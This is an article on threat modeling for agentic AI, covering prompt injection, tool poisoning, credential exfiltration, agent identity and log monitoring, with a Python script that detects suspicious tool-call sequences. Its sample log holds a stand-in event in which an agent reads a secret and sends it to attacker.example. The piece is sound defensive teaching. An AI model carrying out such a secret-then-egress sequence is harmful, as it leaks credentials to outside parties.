Agentic Threat Modeling: Securing the AI Attack Surface
Agentic AI systems introduce a fundamentally new class of security risk. Unlike traditional software that executes deterministic code paths, AI agents operate with autonomy — they browse the web, call external APIs, write and execute code, and chain tool calls together to accomplish goals. Each of those capabilities is a potential attack surface.
The Expanding Attack Surface
A conventional threat model focuses on network perimeters and application layers. An agentic threat model must also account for prompt injection, where malicious content embedded in a tool response or retrieved document hijacks the agent's instructions. It must account for tool poisoning, where a compromised MCP server or API returns payloads designed to alter agent behavior. And it must account for credential exfiltration, where an agent with access to secrets can be manipulated into leaking them.
The MITRE ATT&CK framework is beginning to incorporate agentic attack patterns, but practitioners should not wait for a formal taxonomy. Security teams should map their own agent workflows today using a lightweight threat model: identify every tool an agent can invoke, every data source it can read, and every credential it can access — then ask what happens if any one of those inputs is adversarially controlled.
Identity Is the Control Plane
Because agents act on behalf of human users or services, identity is the most critical control point. Each agent should be issued its own non-human identity with scoped permissions and ephemeral credentials. Treat agent identities the same way you would treat privileged service accounts: rotate credentials frequently, audit every action, and apply least-privilege by default. Any agent that can read a secret should be assumed capable of exfiltrating it if compromised.
Common vulnerability identifiers like CVE-2024-XXXXX are increasingly relevant to the libraries and runtimes that underpin agent frameworks. Keeping a software bill of materials (SBOM) — and the emerging AI bill of materials (AI BOM) — for every model, library, and tool integration is no longer optional for teams operating agents in production.
Monitoring and Response
Agents generate rich audit trails — every tool call, every retrieved document, every model inference can be logged. Security teams should treat these logs with the same rigor applied to infrastructure logs: ingest them into a SIEM, alert on anomalous tool-call sequences, and maintain enough context to reconstruct the chain of agent actions that led to any incident.
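As an added illustration of the anomalous tool-call-sequence alerting described above (example code written for this article, not from any agent framework or SIEM), the script below applies two rules to constructed JSON audit events: a tool call outside an allowlist, and an outbound request to an untrusted host after a secret was read earlier in the same session. The log field names, tool names and hosts are assumptions.

```python
import json
from urllib.parse import urlparse

# Constructed sample audit events, one JSON object per line. Field names are
# assumptions for this example, not the schema of any real agent framework.
SAMPLE_LOG = """\
{"ts": 1, "session": "s1", "tool": "read_document", "args": {"uri": "kb://policy.md"}}
{"ts": 2, "session": "s1", "tool": "read_secret", "args": {"name": "DB_PASSWORD"}}
{"ts": 3, "session": "s1", "tool": "http_request", "args": {"url": "https://attacker.example/collect"}}
{"ts": 4, "session": "s2", "tool": "read_secret", "args": {"name": "API_TOKEN"}}
{"ts": 5, "session": "s2", "tool": "http_request", "args": {"url": "https://api.internal.example/v1"}}
{"ts": 6, "session": "s3", "tool": "shell_exec", "args": {"cmd": "ls"}}
"""

# Policy derived from the lightweight threat model: which tools the agent may
# invoke, which of them touch secrets, which can send data out, and where to.
ALLOWED_TOOLS = {"read_document", "read_secret", "http_request"}
SECRET_TOOLS = {"read_secret"}
EGRESS_TOOLS = {"http_request"}
TRUSTED_HOSTS = {"api.internal.example"}


def parse_events(text):
    """Parse newline-delimited JSON audit events into dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events):
    """Return (session, ts, reason) alerts, processing events in time order."""
    alerts = []
    tainted = {}  # session -> name of the secret read earlier in that session
    for ev in sorted(events, key=lambda e: e["ts"]):
        sess, tool = ev["session"], ev["tool"]
        if tool not in ALLOWED_TOOLS:
            alerts.append((sess, ev["ts"], f"tool not in allowlist: {tool}"))
            continue
        if tool in SECRET_TOOLS:
            tainted[sess] = ev["args"]["name"]
        elif tool in EGRESS_TOOLS and sess in tainted:
            host = urlparse(ev["args"]["url"]).hostname
            if host not in TRUSTED_HOSTS:
                reason = f"egress to {host} after reading secret {tainted[sess]}"
                alerts.append((sess, ev["ts"], reason))
    return alerts


def run_sample():
    """Apply both rules to the constructed log and return the alerts."""
    return detect(parse_events(SAMPLE_LOG))
```

The session-scoped "secret read, then untrusted egress" rule is the kind of correlation a SIEM would express across the whole chain of agent actions rather than per event.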
The organizations that will be best positioned in the agentic era are those that start building these controls now, before an incident forces the conversation.